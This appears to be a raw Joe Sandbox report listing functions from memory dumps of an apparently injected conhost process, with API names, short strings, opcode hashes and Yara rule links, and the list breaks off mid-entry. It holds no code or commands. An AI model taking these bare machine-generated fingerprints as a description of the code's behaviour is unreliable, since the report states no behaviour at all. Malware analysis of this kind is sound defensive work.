                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: 2f6d3f41572074dbf797a3b89f2bab5dad8723c2f0bdf8ccaf074c688e9ccf9d
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 1711513034525042FA78972F97DDB6A2A525B44FF0F1817249F3607ED7DA7894C25E00
                                                                  Function 000002408A291934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID:
                                                                  • API String ID: 517849248-0
                                                                  • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction ID: cba58f7aae1fef502c7737a0110eac5837940fdaf72cd210e9443bb2f7c51ae0
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 32015735704A9082EA60DB1BAA9875A66A1F788FC0F484134DF9A43B54DF38C9CA8B40
                                                                  Function 000002408A293B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: 6ed351fc5884092d464b266d494cf421413f1d755a0bdebb249af24049bf050c
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 0F012535711B5482EB349B2BEA9CB1A67A1BB58B55F080428CB8D06F64EF3DD0D88B00
                                                                  Function 0000024089948835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: cc15dfa73f35049a76f4bd2658b5b809932f1e334a1ab5e39ac77a48dd49227e
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: D751B632B11A0087EF56EF1AD58CB693795F344B99F528124DBD647789DB34C8C2C709
                                                                  Function 000002408A299435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 987445dec8f4b9f7afe52ccb5004dd6d990f796392ba8b7ccc15756544382786
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: C1519232711A108BEB74CB1AE688F5B3B95F344FA8F598124DB0643B98EB35D9C1CB04
                                                                  Function 0000024089948818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 1a0bbf98a2c23ce77fe5efbb94284787a162dec398c8c3bd507efe69019999bc
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 57319131A01A4097EB16FF1AE98C75937A4F344BD9F568014EFD647789DB38C982C709
                                                                  Function 000002408A299418 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction ID: b6a81c66fae93e9dbf9bef855583f8f803501d0b96ed760ae7a162ad1717c719
                                                                  • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction Fuzzy Hash: 07315031301B50D6E735DF1AEA88B1B3B94F744FA8F198114AF5647B98DB38D981CB44
                                                                  Function 000002408A2919D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 22f9254db42dd852a054fb0c3de144e15028e8f6481dd59549d77506837a9453
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 2DF0447230469192EB708B2AF6D879A6761F754F98F844020DB4D46E94DF7CDAC9CF00
                                                                  Function 000002408A29C0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: ab1bc64c037289a28b853d4619410e747e896a56f399b9c3fb967ea78709ae70
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: 1CF0627131161085EF348B2AE9C876A5320BB44BA5F580215C76A459E4CF3DC4C9CF04
                                                                  Function 000002408A29330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: 71705978f6cb1ce3fa542591803e325a567a18d238eced58efbf884a7de0de41
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 81F08271304BD081EA208B2BBA8815A6665BB48FC0F085030EF6A07F18DF3CD4D68B00
                                                                  Function 000002408A295500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: c90d07372c111572b9ee9fa2afbdf04e9bbbf08b0e3b9012b3eb85df31a1fa27
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: D402B732319B8486EB60CB5AE59475BBBA1F384B94F145115EB8E87BA9DF7CC484CF00
                                                                  Function 000002408A295B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: cdac216a2e9814a7210d9ed28c64e02f1d062e686a466d2a1ad5662db5494def
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 9D61B636319A44C6E674CB1EE69871ABBA0F388B94F541115EB8E47FA8DB7CC585CF00
                                                                  Function 0000024089953934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: e597fbee8606c28061fd988be53fa48057de39d88120f6339bf0b4f450caaca6
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 7B1191A2E18A00C2FB56357DE6FF36B13506B94375F1B4634ABEE062DE8B3888C4C100
                                                                  Function 000002408A2A4534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: aec274d7b9c52a4f7c2e00eba4a071199fa9667992659bb1ae8f251f1e0d0b59
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: C2117372B10E3141FB74526EE7DD36912826B78378F484635AB6A0AED6DA34E8C54E00
                                                                  Function 000002408A29AE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 0b199adfdc80bc82c8701da214b21600f841cf8b3c9ce20d85270181f44cc703
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: AD618C73701B848AE720DF6AD584B9E7BA1F348B88F084215EF5917F99DB39C585CB00
                                                                  Function 000002408994A5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: a9fa598c8034417a97bc80aeb75d1609e25bb7154e935cb43b4378e436ebbd15
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 51519F3290138086EB75AF2A96CC35977A4F354BA8F144116DBD94BBD6CB38D4E2CB0C
                                                                  Function 000002408A29B1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: da8709e21cff098c159e4ef2c0cfe91af20e4aa60a643dab7bc207e55f950e2d
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: A4517B32700380C6EB74AB1B9688B6E7AA4F755F94F18421ADB8987F95CB38D4D1CF04
                                                                  Function 000002408A293554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 2e1164a73125c8df79ad022adbc378194918dc516afef4ca300b8d1ff19578e6
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: 50116031314A5191FB70973BEA8979B5AA0F748B80F9841259B4983F94EF38C995CB44
                                                                  Function 000002408A2A2488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: f63fa51d7ac86e5a8a806057eb7daf3c7bcbb633d08fc35e2272ba8b6f0d7ecf
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 4ED12232B04B9089E721CFAAD68479C3BB1F754B98F044216DF5D97FA9DA34D486CB40
                                                                  Function 000002408A2914A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
